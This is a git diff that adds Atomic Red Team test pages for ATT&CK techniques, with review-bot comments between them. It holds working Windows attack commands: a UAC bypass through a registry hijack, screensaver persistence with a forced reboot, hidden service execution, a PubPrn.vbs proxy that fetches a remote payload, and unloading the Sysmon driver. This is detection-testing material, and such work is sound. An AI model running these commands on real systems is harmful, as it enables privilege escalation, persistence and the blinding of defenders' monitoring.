diff --git a/atomics/T1035/T1035.md b/atomics/T1035/T1035.md
new file mode 100644
index 00000000..f7a41bec
--- /dev/null
+++ b/atomics/T1035/T1035.md
@@ -0,0 +1,40 @@
+# T1035 - Service Execution
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1035)
+
Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.
+
+Detection: Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool PsExec.
+
+Platforms: Windows
+
+Data Sources: Windows Registry, Process command-line parameters, Process monitoring
+
+Permissions Required: Administrator, SYSTEM
+
+Remote Support: Yes
+
+## Atomic Tests
+
+- [Atomic Test #1 - Execute a Command as a Service](#atomic-test-1---execute-a-command-as-a-service)
+
+
+
+
+## Atomic Test #1 - Execute a Command as a Service
+Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| service_name | Name of service to create | string | ARTService|
+| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:rt-marker.txt|
+
+#### Run it with `command_prompt`!
+```
+sc.exe create #{service_name} binPath= #{executable_command}
+sc.exe start #{service_name}
+sc.exe delete #{service_name}
+```
+
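Review bot: `binPath= #{executable_command}` passes the default command unquoted, and that default contains spaces, so sc.exe's `option= value` parser will not store the whole command as the service ImagePath; quote the placeholder, e.g. `sc.exe create #{service_name} binPath= "#{executable_command}"`. The default value in the Inputs table also looks damaged: `C:rt-marker.txt` has lost the backslash after the drive letter and part of the file name, so check it against the source YAML before merging. The test deletes the service but never removes the marker file the command creates, so a cleanup step is missing. Two smaller points: the hunk's fourth line (the ATT&CK description paragraph) lacks the leading `+` every other added line carries, which will stop the patch applying cleanly, and "aribrary" in the test description should be "arbitrary".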
diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md
index 06b131f5..a0a1a390 100644
--- a/atomics/T1063/T1063.md
+++ b/atomics/T1063/T1063.md
@@ -28,6 +28,8 @@ Permissions Required: User, Administrator, SYSTEM
- [Atomic Test #3 - Security Software Discovery - ps](#atomic-test-3---security-software-discovery---ps)
+- [Atomic Test #4 - Security Software Discovery - Sysmon Service](#atomic-test-4---security-software-discovery---sysmon-service)
+
@@ -77,3 +79,16 @@ ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
```
+
+
+## Atomic Test #4 - Security Software Discovery - Sysmon Service
+Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+fltmc.exe | findstr.exe 385201
+```
+
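Review bot: the magic number in `fltmc.exe | findstr.exe 385201` is not explained anywhere in the test; say in the description that it is the default altitude the Sysmon minifilter registers at, since that is the reason the match survives a renamed driver, and add the caveat that the altitude is itself a configurable registry value, so this is a heuristic rather than a guarantee. Also note that `fltmc.exe` needs an elevated prompt; the technique header lists User among the possible permissions, and this particular test will not succeed as a standard user.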
diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md
new file mode 100644
index 00000000..8c550233
--- /dev/null
+++ b/atomics/T1088/T1088.md
@@ -0,0 +1,57 @@
+# T1088 - Bypass User Account Control
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1088)
+Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
+
+If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.
+
+Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
+
+* eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)
+
+Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)
+
+Detection: There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of Process Injection and unusual loaded DLLs through DLL Search Order Hijacking, which indicate attempts to gain access to higher privileged processes.
+
+Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
+
+* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command Registry key. (Citation: enigma0x3 Fileless UAC Bypass)
+* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys. (Citation: enigma0x3 sdclt app paths) (Citation: enigma0x3 sdclt bypass)
+
+Analysts should monitor these Registry settings for unauthorized changes.
+
+Platforms: Windows
+
+Data Sources: System calls, Process monitoring, Authentication logs, Process command-line parameters
+
+Effective Permissions: Administrator
+
+Defense Bypassed: Windows User Account Control
+
+Permissions Required: User, Administrator
+
+Contributors: Stefan Kanthak, Casey Smith
+
+## Atomic Tests
+
+- [Atomic Test #1 - Bypass UAC using Event Viewer](#atomic-test-1---bypass-uac-using-event-viewer)
+
+
+
+
+## Atomic Test #1 - Bypass UAC using Event Viewer
+Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
+
+#### Run it with `command_prompt`!
+```
+reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
+cmd.exe -c eventvwr.msc
+```
+
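Review bot: `cmd.exe -c eventvwr.msc` uses a switch cmd.exe does not document; the documented form is `/c`, so use `cmd.exe /c eventvwr.msc` to be safe. More importantly the test has no cleanup: the `mscfile\shell\open\command` hijack stays in HKCU after the run, and that is exactly the key the detection paragraph above tells analysts to watch, so finish with `reg.exe delete hkcu\software\classes\mscfile /f` so a lab host is returned to its original state. Minor: the bare URL in the test description could use the markdown link style already used for the ATT&CK heading.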
diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index 413f99d5..7876b2bc 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -26,6 +26,8 @@ Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems
- [Atomic Test #7 - Disable OpenDNS Umbrella](#atomic-test-7---disable-opendns-umbrella)
+- [Atomic Test #8 - Unload Sysmon Filter Driver](#atomic-test-8---unload-sysmon-filter-driver)
+
@@ -141,3 +143,21 @@ Disables OpenDNS Umbrella
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
+
+
+## Atomic Test #8 - Unload Sysmon Filter Driver
+Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
+
+#### Run it with `command_prompt`!
+```
+fltmc.exe unload #{sysmon_driver}
+```
+
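Review bot: no cleanup: after `fltmc.exe unload #{sysmon_driver}` the Sysmon service keeps running but the minifilter is gone, so the host loses Sysmon telemetry until the driver is reattached; add a cleanup step such as `fltmc.exe load #{sysmon_driver}` (or a restart of the Sysmon service) so a lab host is not left blind after the test. Worth stating in the description that the unload needs an elevated prompt, and that the process creation of fltmc.exe itself is the last event Sysmon records before the unload, which is what a detection for this test should key on.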
diff --git a/atomics/T1180/T1180.md b/atomics/T1180/T1180.md
new file mode 100644
index 00000000..9dc25321
--- /dev/null
+++ b/atomics/T1180/T1180.md
@@ -0,0 +1,51 @@
+# T1180 - Screensaver
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1180)
+Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. (Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.exe is located in C:\Windows\System32\ along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
+
+*SCRNSAVE.exe - set to malicious PE path
+*ScreenSaveActive - set to '1' to enable the screensaver
+*ScreenSaverIsSecure - set to '0' to not require a password to unlock
+*ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed
+
+Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)
+
+Detection: Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
+
+Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.
+
+Platforms: Windows
+
+Data Sources: Process Monitoring, Process command-line parameters, Windows Registry, File monitoring
+
+Permissions Required: User
+
+Contributors: Bartosz Jerzman
+
+## Atomic Tests
+
+- [Atomic Test #1 - Set Arbitrary Binary as Screensaver](#atomic-test-1---set-arbitrary-binary-as-screensaver)
+
+
+
+
+## Atomic Test #1 - Set Arbitrary Binary as Screensaver
+This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_binary | Executable binary to use in place of screensaver for persistence | path | C:\Windows\System32\cmd.exe|
+
+#### Run it with `command_prompt`!
+```
+copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
+reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
+reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverTimeout /t REG_SZ /d 60 /f
+reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
+reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
+shutdown /r /t 0
+```
+
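Review bot: the technique header says `Permissions Required: User`, but the first command copies into `%SystemRoot%\System32`, which needs an elevated prompt; either document the elevation or write the .scr to a user-writable path (the HKCU `SCRNSAVE.EXE` value accepts any full path) so the test matches the stated permission level. `shutdown /r /t 0` reboots the machine immediately with no warning and kills the runner's session mid-test; since the description already says a reboot and logon are required, make that a documented manual step rather than the last line of the command block. There is also no cleanup for the four registry values or the copied file. Minor: the four `*SCRNSAVE.exe` / `*ScreenSaveActive` / `*ScreenSaverIsSecure` / `*ScreenSaverTimeout` lines lack a space after `*` and will not render as a list.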
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
new file mode 100644
index 00000000..34bcaaea
--- /dev/null
+++ b/atomics/T1216/T1216.md
@@ -0,0 +1,45 @@
+# T1216 - Signed Script Proxy Execution
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1216)
+Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
+
+PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command: cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png
+
+There are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)
+
+Detection: Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.
+
+Platforms: Windows
+
+Data Sources: Process monitoring, Process command-line parameters
+
+Defense Bypassed: Application whitelisting, Digital Certificate Validation
+
+Permissions Required: User
+
+Remote Support: No
+
+Contributors: Praetorian
+
+## Atomic Tests
+
+- [Atomic Test #1 - PubPrn.vbs Signed Script Bypass](#atomic-test-1---pubprnvbs-signed-script-bypass)
+
+
+
+
+## Atomic Test #1 - PubPrn.vbs Signed Script Bypass
+Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct|
+
+#### Run it with `command_prompt`!
+```
+cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
+```
+
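Review bot: the script path is hardcoded to `Printing_Admin_Scripts\en-US`, a per-locale folder that only exists on English-language installs, so either make the locale an input or state the assumption in the description. `/b` puts cscript in batch mode and suppresses script errors, which hides the failure when the remote payload cannot be fetched; consider dropping it so a failed download is visible during the test. The Inputs table uses `Url` as the type while the other new tests use lowercase `string` and `path`; keep the type names consistent.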
diff --git a/atomics/index.md b/atomics/index.md
index dbffddd5..5912a86e 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -102,7 +102,8 @@
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
-- T1180 Screensaver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1180 Screensaver](./T1180/T1180.md)
+ - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -128,7 +129,8 @@
- Atomic Test #2: Download & Execute via PowerShell BITS [windows]
- [T1009 Binary Padding](./T1009/T1009.md)
- Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux]
-- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1088 Bypass User Account Control](./T1088/T1088.md)
+ - Atomic Test #1: Bypass UAC using Event Viewer [windows]
- [T1191 CMSTP](./T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -159,6 +161,7 @@
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
+ - Atomic Test #8: Unload Sysmon Filter Driver [windows]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1107 File Deletion](./T1107/T1107.md)
@@ -258,7 +261,8 @@
- [T1064 Scripting](./T1064/T1064.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
+ - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1151 Space after Filename](./T1151/T1151.md)
- Atomic Test #1: Space After Filename [macos]
@@ -289,7 +293,8 @@
- Atomic Test #1: Install AppInit Shim [windows]
- [T1138 Application Shimming](./T1138/T1138.md)
- Atomic Test #1: Application Shim Installation [windows]
-- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1088 Bypass User Account Control](./T1088/T1088.md)
+ - Atomic Test #1: Bypass UAC using Event Viewer [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -383,6 +388,7 @@
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #3: Security Software Discovery - ps [linux, macos]
+ - Atomic Test #4: Security Software Discovery - Sysmon Service [windows]
- [T1082 System Information Discovery](./T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [linux, macos]
@@ -497,9 +503,11 @@
- Atomic Test #3: Scheduled task Remote [windows]
- [T1064 Scripting](./T1064/T1064.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
-- T1035 Service Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1035 Service Execution](./T1035/T1035.md)
+ - Atomic Test #1: Execute a Command as a Service [windows]
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
+ - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- [T1153 Source](./T1153/T1153.md)
- Atomic Test #1: Execute Script using Source [macos, linux]
- Atomic Test #2: Execute Script using Source Alias [macos, linux]
diff --git a/atomics/matrix.md b/atomics/matrix.md
index 85592890..c738f0e5 100644
--- a/atomics/matrix.md
+++ b/atomics/matrix.md
@@ -4,9 +4,9 @@
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Bash History](./T1139/T1139.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | [Logon Scripts](./T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bypass User Account Control [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](./T1088/T1088.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](./T1201/T1201.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote Desktop Protocol](./T1076/T1076.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Hooking](./T1179/T1179.md) | [Permission Groups Discovery](./T1069/T1069.md) | [Remote File Copy](./T1105/T1105.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -21,9 +21,9 @@
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](./T1107/T1107.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Service Discovery](./T1007/T1007.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](./T1053/T1053.md) | [Hooking](./T1179/T1179.md) | [Process Injection](./T1055/T1055.md) | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Time Discovery](./T1124/T1124.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scripting](./T1064/T1064.md) | [Hypervisor](./T1062/T1062.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Gatekeeper Bypass](./T1144/T1144.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Uncommonly Used Port](./T1065/T1065.md) |
-| | Service Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](./T1183/T1183.md) | [Scheduled Task](./T1053/T1053.md) | [HISTCONTROL](./T1148/T1148.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Service Execution](./T1035/T1035.md) | [Image File Execution Options Injection](./T1183/T1183.md) | [Scheduled Task](./T1053/T1053.md) | [HISTCONTROL](./T1148/T1148.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](./T1158/T1158.md) | | | | | | |
-| | Signed Script Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [Hidden Users](./T1147/T1147.md) | | | | | | |
+| | [Signed Script Proxy Execution](./T1216/T1216.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [Hidden Users](./T1147/T1147.md) | | | | | | |
| | [Source](./T1153/T1153.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](./T1165/T1165.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [Space after Filename](./T1151/T1151.md) | [Launch Agent](./T1159/T1159.md) | [Sudo](./T1169/T1169.md) | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](./T1160/T1160.md) | [Sudo Caching](./T1206/T1206.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
@@ -45,7 +45,7 @@
| | | [Registry Run Keys / Start Folder](./T1060/T1060.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
